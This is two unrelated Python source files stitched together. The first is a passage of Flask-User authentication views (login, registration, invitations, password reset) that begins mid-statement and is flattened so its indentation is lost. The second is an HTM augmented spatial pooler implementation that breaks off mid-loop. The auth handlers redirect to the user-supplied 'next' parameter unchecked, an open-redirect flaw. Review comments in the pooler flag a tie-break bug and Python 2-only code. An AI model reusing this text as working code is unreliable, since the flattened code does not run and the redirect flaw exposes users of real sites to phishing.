None else: user_email = None user = user_manager.get_user_by_id(object_id) if user: user.confirmed_at = datetime.utcnow() if user: user.set_active(True) db_adapter.commit() else: # pragma: no cover flash(_('Invalid confirmation token.'), 'error') return redirect(url_for('user.login')) # Send email_confirmed signal signals.user_confirmed_email.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_('Your email has been confirmed.'), 'success') # Auto-login after confirm or redirect to login page next = 
request.args.get('next', _endpoint_url(user_manager.after_confirm_endpoint)) if user_manager.auto_login_after_confirm: return _do_login_user(user, next) # auto-login else: return redirect(url_for('user.login')+'?next='+next) # redirect to login page @login_required @confirm_email_required def change_password(): """ Prompt for old password and new password and change the user's password.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.change_password_form(request.form) form.next.data = request.args.get('next', _endpoint_url(user_manager.after_change_password_endpoint)) # Place ?next query param in next form field # Process valid POST if request.method=='POST' and form.validate(): # Hash password hashed_password = user_manager.hash_password(form.new_password.data) # Change password user_manager.update_password(current_user, hashed_password) # Send 'password_changed' email if user_manager.enable_email and user_manager.send_password_changed_email: emails.send_password_changed_email(current_user) # Send password_changed signal signals.user_changed_password.send(current_app._get_current_object(), user=current_user) # Prepare one-time system message flash(_('Your password has been changed successfully.'), 'success') # Redirect to 'next' URL return redirect(form.next.data) # Process GET or invalid POST return render_template(user_manager.change_password_template, form=form) @login_required @confirm_email_required def change_username(): """ Prompt for new username and old password and change the user's username.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.change_username_form(request.form) form.next.data = request.args.get('next', _endpoint_url(user_manager.after_change_username_endpoint)) # Place ?next query param in next form field # Process valid POST if request.method=='POST' and form.validate(): new_username = 
form.new_username.data # Change username user_auth = current_user.user_auth if db_adapter.UserAuthClass and hasattr(current_user, 'user_auth') else current_user db_adapter.update_object(user_auth, username=new_username) db_adapter.commit() # Send 'username_changed' email if user_manager.enable_email and user_manager.send_username_changed_email: emails.send_username_changed_email(current_user) # Send username_changed signal signals.user_changed_username.send(current_app._get_current_object(), user=current_user) # Prepare one-time system message flash(_("Your username has been changed to '%(username)s'.", username=new_username), 'success') # Redirect to 'next' URL return redirect(form.next.data) # Process GET or invalid POST return render_template(user_manager.change_username_template, form=form) @login_required @confirm_email_required def email_action(id, action): """ Perform action 'action' on UserEmail object 'id' """ user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Retrieve UserEmail by id user_email = db_adapter.find_first_object(db_adapter.UserEmailClass, id=id) # Users may only change their own UserEmails if not user_email or user_email.user_id != int(current_user.get_id()): return unauthorized() if action=='delete': # Primary UserEmail can not be deleted if user_email.is_primary: return unauthorized() # Delete UserEmail db_adapter.delete_object(user_email) db_adapter.commit() elif action=='make-primary': # Disable previously primary emails user_emails = db_adapter.find_all_objects(db_adapter.UserEmailClass, user_id=int(current_user.get_id())) for ue in user_emails: if ue.is_primary: ue.is_primary = False # Enable current primary email user_email.is_primary = True # Commit db_adapter.commit() elif action=='confirm': _send_confirm_email(user_email.user, user_email) else: return unauthorized() return redirect(url_for('user.manage_emails')) def forgot_password(): """Prompt for email and send reset password email.""" user_manager = 
current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.forgot_password_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): email = form.email.data # Find user by email user, user_email = user_manager.find_user_by_email(email) if user: # Generate reset password link token = user_manager.generate_token(int(user.get_id())) reset_password_link = url_for('user.reset_password', token=token, _external=True) # Send forgot password email emails.send_forgot_password_email(user, user_email, reset_password_link) # Store token if hasattr(user, 'reset_password_token'): db_adapter.update_object(user, reset_password_token=token) db_adapter.commit() # Send forgot_password signal signals.user_forgot_password.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_("A reset password email has been sent to '%(email)s'. Open that email and follow the instructions to reset your password.", email=email), 'success') # Redirect to the login page return redirect(_endpoint_url(user_manager.after_forgot_password_endpoint)) # Process GET or invalid POST return render_template(user_manager.forgot_password_template, form=form) def login(): """ Prompt for username/email and password and sign the user in.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_login_endpoint)) reg_next = request.args.get('reg_next', _endpoint_url(user_manager.after_register_endpoint)) # Immediately redirect already logged in users if current_user.is_authenticated() and user_manager.auto_login_at_login: return redirect(next) # Initialize form login_form = user_manager.login_form(request.form) # for login.html register_form = user_manager.register_form() # for login_or_register.html if request.method!='POST': login_form.next.data = register_form.next.data = next login_form.reg_next.data = 
register_form.reg_next.data = reg_next # Process valid POST if request.method=='POST' and login_form.validate(): # Retrieve User user = None user_email = None if user_manager.enable_username: # Find user record by username user = user_manager.find_user_by_username(login_form.username.data) user_email = None # Find primary user_email record if user and db_adapter.UserEmailClass: user_email = db_adapter.find_first_object(db_adapter.UserEmailClass, user_id=int(user.get_id()), is_primary=True, ) # Find user record by email (with form.username) if not user and user_manager.enable_email: user, user_email = user_manager.find_user_by_email(login_form.username.data) else: # Find user by email (with form.email) user, user_email = user_manager.find_user_by_email(login_form.email.data) if user: # Log user in return _do_login_user(user, login_form.next.data, login_form.remember_me.data) # Process GET or invalid POST return render_template(user_manager.login_template, form=login_form, login_form=login_form, register_form=register_form) def logout(): """ Sign the user out.""" user_manager = current_app.user_manager # Send user_logged_out signal signals.user_logged_out.send(current_app._get_current_object(), user=current_user) # Use Flask-Login to sign out user logout_user() # Prepare one-time system message flash(_('You have signed out successfully.'), 'success') # Redirect to logout_next endpoint or '/' next = request.args.get('next', _endpoint_url(user_manager.after_logout_endpoint)) # Get 'next' query param return redirect(next) @login_required @confirm_email_required def manage_emails(): user_manager = current_app.user_manager db_adapter = user_manager.db_adapter user_emails = db_adapter.find_all_objects(db_adapter.UserEmailClass, user_id=int(current_user.get_id())) form = user_manager.add_email_form() # Process valid POST request if request.method=="POST" and form.validate(): user_emails = db_adapter.add_object(db_adapter.UserEmailClass, user_id=int(current_user.get_id()), 
email=form.email.data) db_adapter.commit() return redirect(url_for('user.manage_emails')) # Process GET or invalid POST request return render_template(user_manager.manage_emails_template, user_emails=user_emails, form=form, ) def register(): """ Display registration form and create new User.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_login_endpoint)) reg_next = request.args.get('reg_next', _endpoint_url(user_manager.after_register_endpoint)) # Initialize form login_form = user_manager.login_form() # for login_or_register.html register_form = user_manager.register_form(request.form) # for register.html # invite token used to determine validity of registeree invite_token = request.values.get("token") # require invite without a token should disallow the user from registering if user_manager.require_invitation and not invite_token: flash("Registration is invite only", "error") return redirect(url_for('user.login')) user_invite = None if invite_token and db_adapter.UserInvitationClass: user_invite = db_adapter.find_first_object(db_adapter.UserInvitationClass, token=invite_token) if user_invite: register_form.invite_token.data = invite_token if request.method!='POST': login_form.next.data = register_form.next.data = next login_form.reg_next.data = register_form.reg_next.data = reg_next if user_invite: register_form.email.data = user_invite.email # Process valid POST if request.method=='POST' and register_form.validate(): # Create a User object using Form fields that have a corresponding User field User = db_adapter.UserClass user_class_fields = User.__dict__ user_fields = {} # Create a UserEmail object using Form fields that have a corresponding UserEmail field if db_adapter.UserEmailClass: UserEmail = db_adapter.UserEmailClass user_email_class_fields = UserEmail.__dict__ user_email_fields = {} # Create a UserAuth object using Form fields that have a corresponding 
UserAuth field if db_adapter.UserAuthClass: UserAuth = db_adapter.UserAuthClass user_auth_class_fields = UserAuth.__dict__ user_auth_fields = {} # Enable user account if db_adapter.UserProfileClass: if hasattr(db_adapter.UserProfileClass, 'active'): user_auth_fields['active'] = True elif hasattr(db_adapter.UserProfileClass, 'is_enabled'): user_auth_fields['is_enabled'] = True else: user_auth_fields['is_active'] = True else: if hasattr(db_adapter.UserClass, 'active'): user_fields['active'] = True elif hasattr(db_adapter.UserClass, 'is_enabled'): user_fields['is_enabled'] = True else: user_fields['is_active'] = True # For all form fields for field_name, field_value in register_form.data.items(): # Hash password field if field_name=='password': hashed_password = user_manager.hash_password(field_value) if db_adapter.UserAuthClass: user_auth_fields['password'] = hashed_password else: user_fields['password'] = hashed_password # Store corresponding Form fields into the User object and/or UserProfile object else: if field_name in user_class_fields: user_fields[field_name] = field_value if db_adapter.UserEmailClass: if field_name in user_email_class_fields: user_email_fields[field_name] = field_value if db_adapter.UserAuthClass: if field_name in user_auth_class_fields: user_auth_fields[field_name] = field_value # Add User record using named arguments 'user_fields' user = db_adapter.add_object(User, **user_fields) if db_adapter.UserProfileClass: user_profile = user # Add UserEmail record using named arguments 'user_email_fields' if db_adapter.UserEmailClass: user_email = db_adapter.add_object(UserEmail, user=user, is_primary=True, **user_email_fields) else: user_email = None # Add UserAuth record using named arguments 'user_auth_fields' if db_adapter.UserAuthClass: user_auth = db_adapter.add_object(UserAuth, **user_auth_fields) if db_adapter.UserProfileClass: user = user_auth else: user.user_auth = user_auth require_email_confirmation = True if user_invite: if 
user_invite.email == register_form.email.data: require_email_confirmation = False db_adapter.update_object(user, confirmed_at=datetime.utcnow()) db_adapter.commit() # Send 'registered' email and delete new User object if send fails if user_manager.send_registered_email: try: # Send 'registered' email _send_registered_email(user, user_email, require_email_confirmation) except Exception as e: # delete new User object if send fails db_adapter.delete_object(user) db_adapter.commit() raise e # Send user_registered signal signals.user_registered.send(current_app._get_current_object(), user=user, user_invite=user_invite) # Redirect if USER_ENABLE_CONFIRM_EMAIL is set if user_manager.enable_confirm_email and require_email_confirmation: next = request.args.get('next', _endpoint_url(user_manager.after_register_endpoint)) return redirect(next) # Auto-login after register or redirect to login page next = request.args.get('next', _endpoint_url(user_manager.after_confirm_endpoint)) if user_manager.auto_login_after_register: return _do_login_user(user, reg_next) # auto-login else: return redirect(url_for('user.login')+'?next='+reg_next) # redirect to login page # Process GET or invalid POST return render_template(user_manager.register_template, form=register_form, login_form=login_form, register_form=register_form) @login_required def invite(): """ Allows users to send invitations to register an account """ user_manager = current_app.user_manager db_adapter = user_manager.db_adapter next = request.args.get('next', _endpoint_url(user_manager.after_invite_endpoint)) invite_form = user_manager.invite_form(request.form) if request.method=='POST' and invite_form.validate(): email = invite_form.email.data User = db_adapter.UserClass user_class_fields = User.__dict__ user_fields = { "email": email } user, user_email = user_manager.find_user_by_email(email) if user: flash("User with that email has already registered", "error") return redirect(url_for('user.invite')) else: user_invite = 
db_adapter \ .add_object(db_adapter.UserInvitationClass, **{ "email": email, "invited_by_user_id": current_user.id }) db_adapter.commit() token = user_manager.generate_token(user_invite.id) accept_invite_link = url_for('user.register', token=token, _external=True) # Store token if hasattr(db_adapter.UserInvitationClass, 'token'): user_invite.token = token db_adapter.commit() try: # Send 'invite' email emails.send_invite_email(user_invite, accept_invite_link) except Exception as e: # delete new User object if send fails db_adapter.delete_object(user_invite) db_adapter.commit() raise e signals \ .user_sent_invitation \ .send(current_app._get_current_object(), user_invite=user_invite) flash(_('Invitation has been sent.'), 'success') return redirect(next) return render_template(user_manager.invite_template, form=invite_form) def resend_confirm_email(): """Prompt for email and re-send email conformation email.""" user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Initialize form form = user_manager.resend_confirm_email_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): email = form.email.data # Find user by email user, user_email = user_manager.find_user_by_email(email) if user: _send_confirm_email(user, user_email) # Redirect to the login page return redirect(_endpoint_url(user_manager.after_resend_confirm_email_endpoint)) # Process GET or invalid POST return render_template(user_manager.resend_confirm_email_template, form=form) def reset_password(token): """ Verify the password reset token, Prompt for new password, and set the user's password.""" # Verify token user_manager = current_app.user_manager db_adapter = user_manager.db_adapter is_valid, has_expired, user_id = user_manager.verify_token( token, user_manager.reset_password_expiration) if has_expired: flash(_('Your reset password token has expired.'), 'error') return redirect(url_for('user.login')) if not is_valid: flash(_('Your reset password token 
is invalid.'), 'error') return redirect(url_for('user.login')) user = user_manager.get_user_by_id(user_id) if user: # Avoid re-using old tokens if hasattr(user, 'reset_password_token'): verified = user.reset_password_token == token else: verified = True if not user or not verified: flash(_('Your reset password token is invalid.'), 'error') return redirect(_endpoint_url(user_manager.login_endpoint)) # Initialize form form = user_manager.reset_password_form(request.form) # Process valid POST if request.method=='POST' and form.validate(): # Invalidate the token by clearing the stored token if hasattr(user, 'reset_password_token'): db_adapter.update_object(user, reset_password_token='') # Change password hashed_password = user_manager.hash_password(form.new_password.data) user_auth = user.user_auth if db_adapter.UserAuthClass and hasattr(user, 'user_auth') else user db_adapter.update_object(user_auth, password=hashed_password) db_adapter.commit() # Send 'password_changed' email if user_manager.enable_email and user_manager.send_password_changed_email: emails.send_password_changed_email(user) # Prepare one-time system message flash(_("Your password has been reset successfully. 
Please sign in with your new password"), 'success') # Auto-login after reset password or redirect to login page next = request.args.get('next', _endpoint_url(user_manager.after_reset_password_endpoint)) if user_manager.auto_login_after_reset_password: return _do_login_user(user, next) # auto-login else: return redirect(url_for('user.login')+'?next='+next) # redirect to login page # Process GET or invalid POST return render_template(user_manager.reset_password_template, form=form) def unconfirmed(): """ Prepare a Flash message and redirect to USER_UNCONFIRMED_ENDPOINT""" # Prepare Flash message url = request.script_root + request.path flash(_("You must confirm your email to access '%(url)s'.", url=url), 'error') # Redirect to USER_UNCONFIRMED_EMAIL_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unconfirmed_email_endpoint)) def unauthenticated(): """ Prepare a Flash message and redirect to USER_UNAUTHENTICATED_ENDPOINT""" # Prepare Flash message url = request.url flash(_("You must be signed in to access '%(url)s'.", url=url), 'error') # quote the fully qualified url quoted_url = quote(url) # Redirect to USER_UNAUTHENTICATED_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unauthenticated_endpoint)+'?next='+ quoted_url) def unauthorized(): """ Prepare a Flash message and redirect to USER_UNAUTHORIZED_ENDPOINT""" # Prepare Flash message url = request.script_root + request.path flash(_("You do not have permission to access '%(url)s'.", url=url), 'error') # Redirect to USER_UNAUTHORIZED_ENDPOINT user_manager = current_app.user_manager return redirect(_endpoint_url(user_manager.unauthorized_endpoint)) @login_required @confirm_email_required def user_profile(): user_manager = current_app.user_manager return render_template(user_manager.user_profile_template) def _send_registered_email(user, user_email, require_email_confirmation=True): user_manager = current_app.user_manager db_adapter 
= user_manager.db_adapter # Send 'confirm_email' or 'registered' email if user_manager.enable_email and user_manager.enable_confirm_email: # Generate confirm email link object_id = user_email.id if user_email else int(user.get_id()) token = user_manager.generate_token(object_id) confirm_email_link = url_for('user.confirm_email', token=token, _external=True) # Send email emails.send_registered_email(user, user_email, confirm_email_link) # Prepare one-time system message if user_manager.enable_confirm_email and require_email_confirmation: email = user_email.email if user_email else user.email flash(_('A confirmation email has been sent to %(email)s with instructions to complete your registration.', email=email), 'success') else: flash(_('You have registered successfully.'), 'success') def _send_confirm_email(user, user_email): user_manager = current_app.user_manager db_adapter = user_manager.db_adapter # Send 'confirm_email' or 'registered' email if user_manager.enable_email and user_manager.enable_confirm_email: # Generate confirm email link object_id = user_email.id if user_email else int(user.get_id()) token = user_manager.generate_token(object_id) confirm_email_link = url_for('user.confirm_email', token=token, _external=True) # Send email emails.send_confirm_email_email(user, user_email, confirm_email_link) # Prepare one-time system message email = user_email.email if user_email else user.email flash(_('A confirmation email has been sent to %(email)s with instructions to complete your registration.', email=email), 'success') def _do_login_user(user, next, remember_me=False): # User must have been authenticated if not user: return unauthenticated() # Check if user account has been disabled if not user.is_active(): flash(_('Your account has not been enabled.'), 'error') return redirect(url_for('user.home')) # Check if user has a confirmed email address user_manager = current_app.user_manager if user_manager.enable_email and user_manager.enable_confirm_email \ and 
not current_app.user_manager.enable_login_without_confirm_email \ and not user.has_confirmed_email(): url = url_for('user.resend_confirm_email') flash(_('Your email address has not yet been confirmed. Check your email Inbox and Spam folders for the confirmation email or <a href="%(url)s">Re-send confirmation email</a>.', url=url), 'error') return redirect(url_for('user.home')) # Use Flask-Login to sign in user #print('login_user: remember_me=', remember_me) login_user(user, remember=remember_me) # Send user_logged_in signal signals.user_logged_in.send(current_app._get_current_object(), user=user) # Prepare one-time system message flash(_('You have signed in successfully.'), 'success') # Redirect to 'next' URL return redirect(next) def _endpoint_url(endpoint): url = '/' if endpoint: url = url_for(endpoint) return url
#!/usr/bin/env python
"""
================================LICENSE======================================
Copyright (c) 2015 Chirag Mello & Mario Tambos

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
================================LICENSE======================================

Implementation of the augmented spatial pooler according to:
Thornton, John, and Andrew Srbic. "Spatial pooling for greyscale images."
International Journal of Machine Learning and Cybernetics 4, no. 3 (2013):
207-216.

A region is represented by a 4-dimensional numpy array **columns**, such that:
columns[i, j, k, l] == v in [0, 1) => the column mapped to the coordinates
[i, j] has a *potential* synapse to coordinates [k, l] with permanence v

Another way of thinking about it is that **columns** is a 2-dimensional array
whose elements are columns, and each column is in turn a 2-dimensional array
of synapses.
""" from __future__ import division, print_function from collections import defaultdict import cPickle as pickle from datetime import datetime from functools import partial from pprint import pprint import numpy as np import numexpr as ne from utils import read_input, iter_columns, iter_synapses from common import (update_inhibition_area, calculate_min_activity, inhibit_columns, initialise_synapses, test_for_convergence) from utils import RingBuffer def calculate_overlap(input_vector, columns, min_overlap, connect_threshold, boost): """ Implements the calculateOverlap function from the paper (p. 3). :param input_vector: a single input_vector from the images set. :param columns: the 4-dimensional array of HTM columns: a 4-dimensional array of shape *shape* that represents the HTM columns and their synapses; each element columns[a, b, c, d] contains the permanence value of the synapse connecting the column with coordinates (a, b) to input with coordinates (c, d). :param min_overlap: the BSP's minOverlap parameter (p. 3). Type: float. :param connect_threshold: the BSP's connectThreshold parameter (p. 3). Type: float. :param boost: the BSP's boost matrix (pp. 3, 4). It is a matrix of shape (columns.shape[0], columns.shape[1]) :param overlap_sum: the BSP's overlapSum matrix (p. 4). This parameter is modified and returned. It is a dictionary with tuples (y, x) of HTM column coordinates as keys and deque (a queue implementation) instances as values. The queue for key [a, b] stores a 1 each time the overlap of the column [a, b] was above the minOverlap threshold during the last 1000 iterations. :return: a tuple (overlap, overlap_sum). *overlap* is an array of shape (columns.shape[0], columns.shape[0]); each element overlap[a, b] contains the overlap of the column [a, b] with the input_vector. 
*overlap_sum* is the parameter of the same name; the queue in overlap_sum[a, b] will have a 1 pushed into it if the overlap for the column [a, b] was above the min_overlap threshold this iteration. """ # Initialize the overlap array. overlap = np.zeros(columns.shape[:2]) # for each column ... for y, x, syn_matrix in iter_columns(columns): # @UnusedVariable c = (y, x) # calculate the overlap as the sum of pixel's values in the # input_vector assigned to *connected* synapses and, ... # (numexpr.evaluate optimizes and carries out the operations defined in # its string argument, it is used here because numpy has some # problems when comparing NaNs with numbers) active_synapses = ne.evaluate('syn_matrix >= connect_threshold') overlap[c] = input_vector[active_synapses].sum() # if the overlap is not enough, ... if overlap[c] < min_overlap: # reset it, but, ... overlap[c] = 0 # if the overlap is enough, ... else: # then boost it. overlap[c] *= boost[c] return overlap def learn_synapse_connections(columns, active, input_vector, p_inc, p_dec, activity, min_activity, boost, b_inc, p_mult, connect_threshold, distances, b_max): """ Calculates the minActivity matrix from the paper (p. 6). :param columns: the 4-dimensional array of HTM columns: a 4-dimensional array of shape *shape* that represents the HTM columns and their synapses; each element columns[a, b, c, d] contains the permanence value of the synapse connecting the column with coordinates (a, b) to input with coordinates (c, d). :param active: array of shape (columns.shape[0], columns.shape[0]); each element active[a, b] is True if the column [a, b] is active this iteration and False otherwise. :param input_vector: the input to be learned. A 2-dimensional array of shape (columns.shape[0], columns.shape[1]). :param p_inc: the BSP'perm pInc parameter (p. 4). A float that indicates the amount by which a synapse'perm permanence must be incremented. :param p_dec: the BSP'perm pDec parameter (p. 4). 
        A float that indicates the amount by which a synapse's permanence
        must be decremented.
    :param activity: the BSP's activity matrix (p. 4).
        This parameter is modified and returned.
        It is a dictionary with tuples (y, x) of HTM column coordinates as
        keys and deque (a queue implementation) instances as values.
        The queue for key [a, b] stores a 1 each iteration the column [a, b]
        is active during the last 1000 iterations.
    :param min_activity: the BSP's minActivity matrix (p. 4);
        an array min_activity of shape (columns.shape[0], columns.shape[1]),
        where each min_activity[a, b] represents the calculated minActivity
        for the column [a, b].
    :param boost: the BSP's boost matrix (pp. 3, 4).
        It is a matrix of shape (columns.shape[0], columns.shape[1])
    :param b_inc: the BSP's bInc parameter (p. 4). A float that indicates
        the amount by which a column's boost must be incremented.
    :param p_mult: the BSP's pMult parameter (p. 4). A float that indicates
        the amount by which a synapse's permanence must be multiplied.
    :param connect_threshold: threshold over which a potential synapse is
        considered *connected*. All potential synapses start with a
        permanence value within 0.1 of this parameter.
    :param distances: a 4-dimensional array of the same shape as *columns*;
        each element distances[a, b, c, d] contains the euclidean distance
        from (a, b) to (c, d).
    :param b_max: boost threshold (p. 6).
    :return: a tuple (columns, synapse_modified).
        *columns* is the parameter of the same name, modified according to
        the BSP learning algorithm.
        *synapse_modified* is a boolean indicating whether any synapses were
        modified in the course of learning.
    """
    # Assume no synapse will be modified.
    synapse_modified = False
    mean_input = np.nanmean(input_vector)
    # Store which synapses are connected and which aren't.
    pre_col_matrix = ne.evaluate('columns >= connect_threshold')
    # For each active column [y, x] ...
    for _, _, syn_matrix in iter_columns(columns, active_matrix=active):
        # for each potential synapse [u, v] of [y, x] with permanence perm,
        # (NOTE: by definition, perm = syn_matrix[u, v])
        for u, v, perm in iter_synapses(syn_matrix, only_potential=True):
            s = (u, v)
            # Above-average input on a connected synapse: reinforce it.
            if (input_vector[s] > mean_input and
                    perm >= connect_threshold):
                syn_matrix[s] = min(perm + p_inc, 1)
            # Above-average input on a disconnected synapse: raise it, but
            # keep it p_inc below the connection threshold.
            elif (input_vector[s] > mean_input and
                    perm < connect_threshold):
                syn_matrix[s] = min(perm + p_inc, connect_threshold - p_inc)
            # Otherwise decay the permanence.
            else:
                syn_matrix[s] = max(perm - p_dec, 0)

    # For each column [y, x] ...
    for y, x, syn_matrix in iter_columns(columns):
        c = (y, x)
        # if the activity of [y, x] over the last 1000 iterations was too low,
        if activity[c].sum() < min_activity[c]:
            # increment the boost by b_inc (in the paper this is done inside
            # the if clause in lines 14-15 of algorithm 3 in page 6), ...
            boost[c] += b_inc
            # if its boost is too high, ...
            if boost[c] > b_max:
                # define a function to filter all synapses with a permanence
                # value below the threshold, ...
                # NOTE(review): returning (perm, distance) means max() breaks
                # permanence ties by the LARGEST distance, i.e. the FARTHEST
                # synapse — contradicting the "nearest in case of tie"
                # comment below; likely should be (perm, -distance). Also,
                # comparing this tuple with -np.infty in max() only works in
                # Python 2 (mixed-type ordering); Python 3 would raise.
                def filter_permanences(s):
                    u, v, perm = s
                    if perm < connect_threshold:
                        return (perm, distances[c][u, v])
                    else:
                        return -np.infty
                # reset the boost for column [y, x], ...
                boost[c] = 1
                # select the disconnected synapse with the highest permanence,
                # choosing the nearest synapse in case of tie, ...
                max_syn = max(iter_synapses(syn_matrix),
                              key=filter_permanences)
                max_s = max_syn[:2]
                # and set the selected synapse's permanence value to p_inc
                # above the threshold.
                syn_matrix[max_s] = connect_threshold + p_inc

    # Set synapse_modified to True if any synapse change from connected to
    # disconnected or vice-versa by this algorithm.
    if (pre_col_matrix !=
            ne.evaluate('columns >= connect_threshold')).any():
        synapse_modified = True

    # Return the columns array, with its synapses modified.
    return columns, synapse_modified


def spatial_pooler(images, shape, p_connect=0.15, connect_threshold=0.2,
                   p_inc=0.02, p_dec=0.02, b_inc=0.005, p_mult=0.01,
                   min_activity_threshold=0.01, desired_activity_mult=0.05,
                   b_max=4, max_iterations=10000, cycles_to_save=100,
                   output_file=None):
    """
    Implements the main BSP loop (p. 3). It goes continually through the
    images set until convergence.

    :param images: set of images to learn from. It is an array of shape
        (l, m, n) where (m, n) == (shape[0], shape[1]) and
        (m, n) == (shape[2], shape[3])
    :param shape: the shape of the output array. It must have 4 components,
        and (shape[0], shape[1]) == (shape[2], shape[3]).
    :param p_connect: probability of the columns mapped to [i, j] to have a
        potential synapse to coordinates [k, l], for all i in shape[0],
        j in shape[1], k in shape[2], and l in shape[3].
    :param connect_threshold: threshold over which a potential synapse is
        considered *connected*. All potential synapses start with a
        permanence value within 0.1 of this parameter.
    :param p_inc: the BSP's pInc parameter (p. 4). A float that indicates
        the amount by which a synapse's permanence must be incremented.
    :param p_dec: the BSP's pDec parameter (p. 4). A float that indicates
        the amount by which a synapse's permanence must be decremented.
    :param b_inc: the BSP's bInc parameter (p. 4). A float that indicates
        the amount by which a column's boost must be incremented.
    :param p_mult: the BSP's pMult parameter (p. 4). A float that indicates
        the amount by which a synapse's permanence must be multiplied.
    :param min_activity_threshold: the BSP's minActivityThreshold parameter
        (p. 4).
    :param desired_activity_mult: the BSP's desiredActivityMult parameter
        (p. 4).
    :param b_max: the ASP's bMax parameter (p. 6): the boost threshold over
        which a column's boost is reset and one of its disconnected synapses
        is promoted (see learn_synapse_connections).
    :param max_iterations: an integer indicating the maximum number of runs
        through the set of images allowed. Pass None if no limit is desired.
    :param cycles_to_save: wait this number of iterations over the complete
        set of images before saving the columns to disk.
    :param output_file: file name used to save the pickled columns.
    :return: a matrix *columns* of shape *shape*, created and modified
        according to the BSP learning algorithm.
    """
    # Initialize boost matrix.
    boost = np.ones(shape=shape[:2])
    # Factory for per-column 1000-slot boolean ring buffers recording
    # whether the column was active on each of the last 1000 iterations.
    # NOTE(review): np.bool is removed in modern NumPy; bool/np.bool_ is the
    # replacement (this module is Python 2 era code).
    part_rbuffer = partial(RingBuffer,
                           input_array=np.zeros(1000, dtype=np.bool),
                           copy=True)
    # Initialize activity dictionary.
    activity = defaultdict(part_rbuffer)

    # Initialize columns and distances matrices.
    pprint("Initializing synapses ...")
    columns, distances = initialise_synapses(shape, p_connect,
                                             connect_threshold)
    # Print a small random sample of the initial state for eyeballing.
    pprint("Columns:")
    random_rows = np.random.randint(0, shape[0], 2)
    random_cols = np.random.randint(0, shape[1], 2)
    pprint(columns[random_rows, random_cols])
    pprint("Distances:")
    pprint(distances[random_rows, random_cols])
    # Calculate the inhibition_area parameter.
    pprint("Calculating inhibition area ...")
    inhibition_area = update_inhibition_area(columns, connect_threshold)
    pprint("Inhibition area: %s" % inhibition_area)
    # Calculate the desired activity in a inhibition zone.
    pprint("Calculating desired activity ...")
    desired_activity = desired_activity_mult * inhibition_area
    pprint("Desired activity: %s" % desired_activity)

    converged = False
    i = 0
    # While synapses are modified and the maximum number of iterations is not
    # overstepped, ...
    pprint("Starting learning loop ...")
    start = datetime.now()
    while not converged and (max_iterations is None or i < max_iterations):
        # Initialize the synapses_modified array, assuming no synapses will be
        # modified.
synapses_modified = np.zeros(shape=len(images), dtype=np.bool) # For each image *image*, with index *j* in the images set, ... for j, image, _ in read_input(images): # According to the paper (sic): # "minOverlap was dynamically set to be the product of the mean # pixel intensity of the current image and the mean number of # connected synapses for an individual column." # This leaves unclear exactly what is meant by "mean number of # connected synapses for an individual column"; it could be a # historical mean or a mean over all columns, here the latter was # chosen. mean_conn_synapses = (columns[columns > connect_threshold].size / (shape[2] * shape[3])) min_overlap = image.mean() * mean_conn_synapses # calculate the overlap of the columns with the image. # (this is a simple count of the number of its connected synapses # that are receiving active input (p. 3)), ... overlap = calculate_overlap(image, columns, min_overlap, connect_threshold, boost) # force sparsity by inhibiting columns, ... active, activity =\ inhibit_columns(columns, distances, inhibition_area, overlap, activity, desired_activity) # calculate the min_activity matrix, ... min_activity =\ calculate_min_activity(columns, active, distances, inhibition_area, activity, min_activity_threshold) # and finally, adapt the synapse's permanence values. columns, synapses_modified[j] =\ learn_synapse_connections(columns, active, image, p_inc, p_dec, activity, min_activity, boost, b_inc, p_mult, connect_threshold, distances, b_max) # Update the inhibition_area parameter. inhibition_area = update_inhibition_area(columns, connect_threshold) # Update the desired activity in a inhibition zone. desired_activity = desired_activity_mult * inhibition_area # Print a snapshot of the model state every 1000 images. 
            if j % 1000 == 0:
                pprint("########## %sth image of %sth iteration ##########" %
                       (j+1, i+1))
                elapsed = datetime.now() - start
                elapsed_h = elapsed.total_seconds() // 3600
                elapsed_m = (elapsed.total_seconds() // 60) % 60
                elapsed_s = elapsed.seconds % 60
                pprint("########## Elapsed time: %02d:%02d:%02d ##########" %
                       (elapsed_h, elapsed_m, elapsed_s))
                pprint("Overlap:")
                pprint(overlap[random_rows, random_cols])
                pprint("Activity:")
                # NOTE(review): dict.iterkeys() is Python 2 only, and dict
                # order is arbitrary here, so which columns get printed may
                # vary between runs.
                for l, key in enumerate(activity.iterkeys()):
                    if l in random_rows:
                        pprint(activity[key][-100:])
                pprint("Active:")
                pprint(active[random_rows, random_cols])
                pprint("Min activity:")
                pprint(min_activity[random_rows, random_cols])
                pprint("Inhibition area: %s" % inhibition_area)
                pprint("Inhibition radius: %s" %
                       (np.sqrt(inhibition_area/np.pi),))
                pprint("Desired activity: %s" % desired_activity)
                pprint("Synapses modified: %s" % synapses_modified[j])
        # Check if any synapses changed from connected to disconnected or
